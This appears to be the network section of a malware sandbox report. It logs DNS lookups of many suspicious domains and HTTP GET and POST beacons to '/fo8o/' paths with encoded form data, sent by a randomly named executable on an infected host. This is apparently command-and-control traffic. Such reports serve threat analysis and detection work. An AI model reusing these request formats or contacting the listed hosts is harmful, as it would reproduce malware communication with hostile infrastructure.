Dec 24, 2024 08:26:04.669610977 CET	49992	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:04.669610977 CET	49992	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:04.789804935 CET	80	49992	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:05.911892891 CET	80	49992	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:05.911927938 CET	80	49992	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:05.911973000 CET	49992	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:06.174623966 CET	49992	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:07.193877935 CET	49993	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:07.313463926 CET	80	49993	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:07.313568115 CET	49993	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:07.316011906 CET	49993	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:07.435723066 CET	80	49993	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:07.435817957 CET	80	49993	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:08.609363079 CET	80	49993	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:08.609491110 CET	80	49993	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:08.610012054 CET	49993	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:08.831043959 CET	49993	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:09.851074934 CET	49994	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:09.970818996 CET	80	49994	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:09.970916033 CET	49994	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:09.974004984 CET	49994	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:10.094927073 CET	80	49994	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:11.200171947 CET	80	49994	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:11.200232029 CET	80	49994	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:11.200375080 CET	49994	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:11.203862906 CET	49994	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:11.323468924 CET	80	49994	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:16.927803040 CET	49995	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:17.047622919 CET	80	49995	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:17.049753904 CET	49995	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:17.053678989 CET	49995	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:17.173268080 CET	80	49995	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:18.365266085 CET	80	49995	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:18.365376949 CET	80	49995	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:18.367887974 CET	49995	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:18.565241098 CET	49995	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:19.585092068 CET	49996	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:19.705005884 CET	80	49996	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:19.705106020 CET	49996	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:19.707659006 CET	49996	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:19.827503920 CET	80	49996	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:21.013710022 CET	80	49996	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:21.013905048 CET	80	49996	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:21.014134884 CET	49996	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:21.221443892 CET	49996	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:22.240015984 CET	49997	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:22.360059023 CET	80	49997	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:22.361773014 CET	49997	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:22.363699913 CET	49997	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:22.483494043 CET	80	49997	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:22.483539104 CET	80	49997	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:23.672518015 CET	80	49997	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:23.672736883 CET	80	49997	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:23.672797918 CET	49997	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:23.877904892 CET	49997	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:24.897011995 CET	49998	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:25.016808987 CET	80	49998	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:25.016957998 CET	49998	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:25.018898964 CET	49998	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:25.138454914 CET	80	49998	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:26.330123901 CET	80	49998	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:26.330188036 CET	80	49998	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:26.330372095 CET	49998	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:26.333156109 CET	49998	80	192.168.2.5	195.110.124.133
Dec 24, 2024 08:26:26.452872992 CET	80	49998	195.110.124.133	192.168.2.5
Dec 24, 2024 08:26:48.397732019 CET	49999	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:48.517299891 CET	80	49999	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:48.522085905 CET	49999	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:48.525791883 CET	49999	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:48.645292044 CET	80	49999	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:49.799134016 CET	80	49999	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:49.799676895 CET	80	49999	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:49.799720049 CET	49999	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:50.034008980 CET	49999	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:51.053756952 CET	50000	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:51.173360109 CET	80	50000	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:51.173477888 CET	50000	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:51.177751064 CET	50000	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:51.297264099 CET	80	50000	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:52.374905109 CET	80	50000	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:52.375025034 CET	80	50000	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:52.380858898 CET	50000	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:52.693753004 CET	50000	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:53.715574980 CET	50001	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:53.835297108 CET	80	50001	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:53.835386038 CET	50001	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:53.837863922 CET	50001	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:53.957551956 CET	80	50001	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:53.957562923 CET	80	50001	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:55.035578012 CET	80	50001	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:55.035623074 CET	80	50001	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:55.035774946 CET	50001	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:55.346410036 CET	50001	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:56.364775896 CET	50002	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:56.485702991 CET	80	50002	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:56.485817909 CET	50002	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:56.487705946 CET	50002	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:56.608500004 CET	80	50002	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:57.687829018 CET	80	50002	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:57.688011885 CET	80	50002	217.196.55.202	192.168.2.5
Dec 24, 2024 08:26:57.688066959 CET	50002	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:57.691257954 CET	50002	80	192.168.2.5	217.196.55.202
Dec 24, 2024 08:26:57.810801029 CET	80	50002	217.196.55.202	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 08:23:32.153824091 CET	56983	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:23:32.937932968 CET	53	56983	1.1.1.1	192.168.2.5
Dec 24, 2024 08:23:50.428287983 CET	64553	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:23:50.828819036 CET	53	64553	1.1.1.1	192.168.2.5
Dec 24, 2024 08:23:58.943700075 CET	63600	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:23:59.658977985 CET	53	63600	1.1.1.1	192.168.2.5
Dec 24, 2024 08:24:14.444183111 CET	63842	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:24:14.670141935 CET	53	63842	1.1.1.1	192.168.2.5
Dec 24, 2024 08:24:22.777465105 CET	57641	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:24:23.442274094 CET	53	57641	1.1.1.1	192.168.2.5
Dec 24, 2024 08:25:37.866753101 CET	62087	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:25:38.228475094 CET	53	62087	1.1.1.1	192.168.2.5
Dec 24, 2024 08:25:52.975785017 CET	56140	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:25:53.197678089 CET	53	56140	1.1.1.1	192.168.2.5
Dec 24, 2024 08:26:01.256917000 CET	49212	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:26:01.887883902 CET	53	49212	1.1.1.1	192.168.2.5
Dec 24, 2024 08:26:16.211966038 CET	64255	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:26:16.920573950 CET	53	64255	1.1.1.1	192.168.2.5
Dec 24, 2024 08:26:31.350543976 CET	56470	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:26:31.576812029 CET	53	56470	1.1.1.1	192.168.2.5
Dec 24, 2024 08:26:39.632222891 CET	50500	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:26:39.847498894 CET	53	50500	1.1.1.1	192.168.2.5
Dec 24, 2024 08:26:47.933340073 CET	51181	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:26:48.391799927 CET	53	51181	1.1.1.1	192.168.2.5
Dec 24, 2024 08:27:02.710113049 CET	63096	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:27:02.935139894 CET	53	63096	1.1.1.1	192.168.2.5
Dec 24, 2024 08:27:10.990312099 CET	65231	53	192.168.2.5	1.1.1.1
Dec 24, 2024 08:27:11.411546946 CET	53	65231	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 08:23:32.153824091 CET	192.168.2.5	1.1.1.1	0x5563	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:23:50.428287983 CET	192.168.2.5	1.1.1.1	0xb24f	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:23:58.943700075 CET	192.168.2.5	1.1.1.1	0x7193	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:24:14.444183111 CET	192.168.2.5	1.1.1.1	0x8de5	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:24:22.777465105 CET	192.168.2.5	1.1.1.1	0xbdc3	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:25:37.866753101 CET	192.168.2.5	1.1.1.1	0x80fa	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:25:52.975785017 CET	192.168.2.5	1.1.1.1	0x93d3	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:01.256917000 CET	192.168.2.5	1.1.1.1	0x62c0	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:16.211966038 CET	192.168.2.5	1.1.1.1	0x527b	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:31.350543976 CET	192.168.2.5	1.1.1.1	0x82cf	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:39.632222891 CET	192.168.2.5	1.1.1.1	0xc684	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:47.933340073 CET	192.168.2.5	1.1.1.1	0xf08b	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:27:02.710113049 CET	192.168.2.5	1.1.1.1	0x1664	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:27:10.990312099 CET	192.168.2.5	1.1.1.1	0xa19f	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 08:23:32.937932968 CET	1.1.1.1	192.168.2.5	0x5563	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:23:50.828819036 CET	1.1.1.1	192.168.2.5	0xb24f	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:23:59.658977985 CET	1.1.1.1	192.168.2.5	0x7193	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:24:14.670141935 CET	1.1.1.1	192.168.2.5	0x8de5	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:24:23.442274094 CET	1.1.1.1	192.168.2.5	0xbdc3	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 08:24:23.442274094 CET	1.1.1.1	192.168.2.5	0xbdc3	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 08:24:23.442274094 CET	1.1.1.1	192.168.2.5	0xbdc3	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:25:38.228475094 CET	1.1.1.1	192.168.2.5	0x80fa	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:25:53.197678089 CET	1.1.1.1	192.168.2.5	0x93d3	Name error (3)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:01.887883902 CET	1.1.1.1	192.168.2.5	0x62c0	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:16.920573950 CET	1.1.1.1	192.168.2.5	0x527b	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 08:26:16.920573950 CET	1.1.1.1	192.168.2.5	0x527b	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:31.576812029 CET	1.1.1.1	192.168.2.5	0x82cf	Name error (3)	www.donnavariedades.com	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:39.847498894 CET	1.1.1.1	192.168.2.5	0xc684	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:26:48.391799927 CET	1.1.1.1	192.168.2.5	0xf08b	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 08:26:48.391799927 CET	1.1.1.1	192.168.2.5	0xf08b	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:27:02.935139894 CET	1.1.1.1	192.168.2.5	0x1664	Name error (3)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:27:11.411546946 CET	1.1.1.1	192.168.2.5	0xa19f	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49732	154.215.72.110	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:23:33.859038115 CET	514	OUT	GET /fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 24, 2024 08:23:35.385493040 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Dec 2024 07:23:35 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49788	116.50.37.244	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:23:59.782883883 CET	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: UzG=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Dec 24, 2024 08:24:01.294707060 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 24 Dec 2024 07:24:00 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49800	116.50.37.244	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:24:02.423640013 CET	819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34 Data Ascii: UzG=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
Dec 24, 2024 08:24:03.927052975 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 24 Dec 2024 07:24:03 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

